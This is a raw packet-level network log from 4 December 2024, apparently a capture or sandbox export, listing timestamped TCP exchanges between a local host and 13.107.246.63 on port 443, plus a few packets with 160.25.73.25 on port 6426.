                                                                                                                                                                                  Dec 4, 2024 11:10:06.104337931 CET4434975613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.104444027 CET49756443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.104753971 CET49756443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.104773045 CET4434975613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.104789019 CET49756443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.104794025 CET4434975613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.107935905 CET49762443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.107978106 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.108058929 CET49762443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.108256102 CET49762443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.108268023 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.143150091 CET4434975913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.143217087 CET4434975913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.143299103 CET49759443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.143610001 CET49759443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.143626928 CET4434975913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.143640041 CET49759443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.143647909 CET4434975913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.146903038 CET49763443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.146924973 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:06.147017956 CET49763443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.147176981 CET49763443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:06.147186041 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.659490108 CET4434975513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.659554958 CET4434975513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.659617901 CET49755443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.659811974 CET49755443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.659832954 CET4434975513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.659847021 CET49755443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.659852028 CET4434975513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.662290096 CET49764443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.662333012 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.662405968 CET49764443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.662532091 CET49764443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.662543058 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.749676943 CET4434976013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.750217915 CET49760443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.750233889 CET4434976013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.750686884 CET49760443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.750691891 CET4434976013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.813489914 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.813952923 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.813981056 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.814315081 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.814320087 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.865379095 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.865812063 CET49763443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.865820885 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.866240025 CET49763443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.866242886 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.890796900 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.891084909 CET49762443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.891100883 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:07.891416073 CET49762443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:07.891422033 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.093554020 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.094796896 CET497406426192.168.2.4160.25.73.25
                                                                                                                                                                                  Dec 4, 2024 11:10:08.184137106 CET4434976013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.184195042 CET4434976013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.184240103 CET49760443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.184423923 CET49760443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.184441090 CET4434976013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.184448957 CET49760443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.184454918 CET4434976013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.187151909 CET49765443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.187186003 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.187274933 CET49765443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.187442064 CET49765443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.187454939 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.215030909 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.259465933 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.259526014 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.259576082 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.259718895 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.259732008 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.259743929 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.259747982 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.262175083 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.262209892 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.262288094 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.262423992 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.262433052 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.300524950 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.300570011 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.300642014 CET49763443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.300882101 CET49763443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.300887108 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.300895929 CET49763443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.300899029 CET4434976313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.304075956 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.304102898 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.304167032 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.304306984 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.304318905 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.334830046 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.334875107 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.334920883 CET49762443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.335021973 CET49762443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.335040092 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.335048914 CET49762443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.335052967 CET4434976213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.336812019 CET49768443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.336839914 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:08.336915970 CET49768443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.337039948 CET49768443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:08.337053061 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.385174036 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.385668993 CET49764443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.385688066 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.386109114 CET49764443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.386115074 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.821966887 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.822033882 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.822113991 CET49764443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.822293043 CET49764443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.822316885 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.822326899 CET49764443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.822334051 CET4434976413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.825201988 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.825248957 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.825345993 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.825520992 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.825531960 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.903538942 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.904320002 CET49765443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.904355049 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.904797077 CET49765443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.904803038 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.978631973 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.978992939 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.979010105 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:09.979358912 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:09.979363918 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.019613981 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.020289898 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.020304918 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.020720959 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.020725012 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.117237091 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.117716074 CET49768443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.117747068 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.118182898 CET49768443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.118187904 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.338310957 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.338377953 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.338428020 CET49765443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.338567019 CET49765443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.338587046 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.338597059 CET49765443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.338601112 CET4434976513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.340893030 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.340934038 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.340995073 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.341146946 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.341156006 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.413750887 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.413830042 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.413892984 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.418677092 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.418699980 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.418709993 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.418715954 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.421219110 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.421258926 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.421328068 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.421691895 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.421701908 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.454822063 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.454874992 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.454938889 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.459180117 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.459197044 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.459208965 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.459213972 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.467987061 CET49772443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.468043089 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.468122005 CET49772443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.468238115 CET49772443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.468254089 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.561750889 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.561813116 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.561862946 CET49768443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.562180042 CET49768443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.562196970 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.562213898 CET49768443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.562218904 CET4434976813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.565588951 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.565633059 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:10.565689087 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.565813065 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:10.565819025 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:11.605755091 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:11.608525038 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:11.608555079 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:11.608990908 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:11.608995914 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.050077915 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.050157070 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.050255060 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.050451040 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.050473928 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.050486088 CET49769443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.050492048 CET4434976913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.052896023 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.052943945 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.053030968 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.053158045 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.053169966 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.056512117 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.056801081 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.056828022 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.057190895 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.057195902 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.143136024 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.143692970 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.143708944 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.144156933 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.144161940 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.183557034 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.183983088 CET49772443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.184009075 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.184423923 CET49772443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.184428930 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.344768047 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.345446110 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.345482111 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.345910072 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.345915079 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.491704941 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.491767883 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.491831064 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.492156982 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.492177010 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.492188931 CET49770443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.492193937 CET4434977013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.499735117 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.499766111 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.499825001 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.500199080 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.500212908 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.578723907 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.578799009 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.578850031 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.579145908 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.579166889 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.579178095 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.579184055 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.581949949 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.581978083 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.582087040 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.582325935 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.582338095 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.618566990 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.618633986 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.618690968 CET49772443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.618858099 CET49772443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.618880033 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.618891954 CET49772443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.618896961 CET4434977213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.621598959 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.621644974 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.621733904 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.621912003 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.621929884 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.788558006 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.788625956 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.788789988 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.788921118 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.788939953 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.788950920 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.788958073 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.792249918 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.792290926 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:12.792402029 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.792623043 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:12.792637110 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:13.837124109 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:13.838002920 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:13.838033915 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:13.838505983 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:13.838517904 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.282565117 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.282639027 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.282694101 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.282936096 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.282936096 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.282954931 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.282962084 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.286000013 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:14.286051989 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:14.286117077 CET49779443192.168.2.413.107.246.63
